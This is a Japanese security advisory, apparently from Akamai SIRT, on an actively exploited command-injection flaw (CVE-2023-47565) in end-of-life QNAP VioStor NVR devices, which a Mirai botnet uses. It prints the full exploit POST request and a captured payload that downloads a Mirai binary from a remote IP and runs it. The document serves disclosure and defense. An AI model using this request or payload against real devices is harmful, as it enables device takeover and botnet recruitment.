QNAP VioStor NVR で活発に悪用される脆弱性:修正済み、パッチが利用可能
エグゼクティブサマリー
Akamai Security Intelligence Response Team(SIRT)は、 InfectedSlurs アドバイス をさらに更新し、影響を受けたベンダーの 1 社が 勧告情報を発表し、 ガイダンスを公開したことを発表しました。
QNAP 内の脆弱性は野放しになっている状態で確認され、CVE ID CVE-2023-47565、CVSS v3 スコア 8.0 が割り当てられています。
野放しになっているところを捕捉された悪性のペイロードは、Mirai ベースのマルウェアを 分散サービス妨害(DDoS)攻撃 ボットネット構築目的でインストールします。
当社は、 威の痕跡情報(IOC)、Snort ルール、および YARA ルール を独自のリサーチで提供し、野放しになっているこれらの攻撃の試みと、防御側のネットワークにおけるアクティブな感染の可能性を特定するのに役立てました。
知っておくべきこと
SIRT は、InfectedSlurs 調査の中で、QNAP VioStor ネットワーク・ビデオ・レコーダー(NVR)デバイスの脆弱性が野放し状態で活発に悪用されていることを発見しました。NVR デバイスは、IP カメラ、動画記録、再生、遠隔からのデータアクセスをネットワークベースで監視する高性能なネットワーク監視ソリューションです。この脆弱性には、CVE ID CVE-2023-47565、CVSS v3 スコア 8.0 が割り当てられています。
この脆弱性により、認証を受けた攻撃者は、管理インターフェースへの POST リクエストを介して配信されるペイロードを使用して、OS コマンドインジェクションを実行することができます。現在の設定では、キャプチャされたペイロードでデバイスのデフォルトの認証情報が使用されています。
影響を受ける QNAP VioStor NVR ファームウェアのバージョンは次のとおりです。
VioStor NVR:バージョン 5.0.0 およびそれ以前(2014 年 6 月 21 日にリリースされた 5.0.0)
QNAP では、これらのデバイスをサポート終了とみなしていますが、 ベンダーの推奨 では、既存のデバイスで VioStor ファームウェアを利用可能な最新バージョンにアップグレードすること、となっています。この問題は以前にもパッチが適用されていましたが、公には報告も公表もされていませんでした。 また、ユーザーはデバイスのデフォルトパスワードも変更する必要があります。
さらに、US-CERT は勧告を発表しています。
観察された攻撃
当初、InfectedSlurs キャンペーン中に攻撃ペイロードを確認した際には、観測された攻撃を特定のデバイスやメーカーと関連付けることができなかったため、2 つのゼロデイ脆弱性のみを報告しました。その結果、攻撃の ゼロデイ 分類を確定することが困難となりました。
攻撃とペイロードについてさまざまな角度から詳しく調べた結果、SIRT はターゲットが QNAP VioStor NVR デバイスであるとの確信に至りました。これらのデバイスは、キャンペーンのターゲットプロファイルに合致しており、脆弱なデフォルト認証情報(マニュアルに記載されていて、攻撃の中でっ観測)で出荷されていました。最初の 2 つのゼロデイと同様に、感染したデバイスは、影響を受ける Internet of Things(IoT)および NVR デバイスの NTP 設定における OS コマンドインジェクションの脆弱性を助長する恐れがあります。
これらの見解を US-CERT に伝えた後、Akamai SIRT および QNAP と連携して証拠を検証し、SIRT の見解を確認しました。 最終的に QNAP は、ペイロードが、同社の VioStor デバイスを標的にしていることを確認しました。これらのデバイスは廃止になっており、サポートが終了していますが、 以前にリリースされたファームウェアの古いバージョン(5.0.0 およびそれ以前)のみが標的でした。
この脆弱性は、 /cgi-bin/server/server.cgi パスに対して POST リクエストを送信することで悪用されます。リモートコード実行(RCE)は、 SPECIFIC_SERVER の引数が指定されていると可能になります(図 1)。
URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=
PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]
図 1:コマンドインジェクションによる RCE の悪用の試み
キャプチャされた感染ペイロードの例を図 2 に示します。
wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86
図 2:キャプチャされた RCE ペイロード
基本的なセキュリティ対策の重要性
基本は重要です。 これらの観察結果は、初期設定時にデバイスのデフォルトパスワードを変更するなど、セキュリティ上の基本的なベストプラクティスの重要性を再認識させるものです。また、潜在的な攻撃から保護するためにシステムを継続的に更新することや、システムやデバイスが奇妙なふるまいをしている場合は特に、随時チェックすることなど、より強力な長期的かつプロアクティブなセキュリティプロトコルを導入することの重要性も強調しています。
結論
繰り返しになりますが、当社独自のハニーポットネットワーク展開により、サイバー攻撃に関する貴重な知見が得られ、これまで知られていなかった脆弱性が明らかになりました。デフォルトの認証情報や、サポートされていない古いネットワークシステムの存在が、ボットネット感染経路として利用されるようになってきています。レガシーシステムは、新たな脆弱性を発見・悪用してマルウェアを伝播するための温床となっています。
この結果は、IoT のベストプラクティスに関する認識と教育を強化することが非常に重要であり、一般消費者にとってもリスクが無縁ではないことを示唆しています。この認識の必要性は、消費者だけでなく、これらのデバイスの製造業者にも当てはまります。システムのセキュリティを維持するためには、ソフトウェアのサポートサイクルを長くし、パスワードの強制変更など、セットアップ時のセキュリティを強化することが重要です。
今後の情報提供
Akamai Security Intelligence Group は、このような脅威を継続的に監視して報告し、お客様やセキュリティコミュニティ全般の意識向上を促進します。Akamai が実施している調査の最新情報をお求めの場合は、 X (旧 Twitter)で Akamai をフォローしてください。
Akamai SIRT は、CISA、US-CERT、および QNAP に対し、当社のコミュニケーション、調整、特定、修復、および情報公開の取り組みを支援していただいたことに深く感謝いたします。脆弱性に焦点を当てます。
